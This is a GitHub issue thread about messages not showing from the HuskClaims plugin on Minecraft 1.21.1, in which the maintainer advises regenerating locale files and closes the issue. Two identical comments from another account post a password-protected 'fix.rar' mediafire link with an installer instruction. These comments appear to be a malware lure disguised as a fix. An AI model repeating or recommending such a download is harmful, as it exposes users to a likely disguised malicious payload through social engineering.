### ISSUE TITLE
No messages from plugins in minecraft 1.21.1

### ISSUE THREAD

**Issue by AquaMCVN** [WiIIiam278/HuskClaims#178]
Version: 1.21.1
Fork: purpurmc, paper & pufferfish  ( I tried all three )
Version plugin: last

Video Link: https://streamable.com/73f1w2

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by WiIIiam278** [comment]
Please regenerate your locale files - and make sure the plugin starts correctly

**Comment by AquaMCVN** [comment]
ok i will

**Comment by WiIIiam278** [comment]
I'm closing this as unable to reproduce. Simply put, I can see messages in chat -- please open a support ticket for further support :)
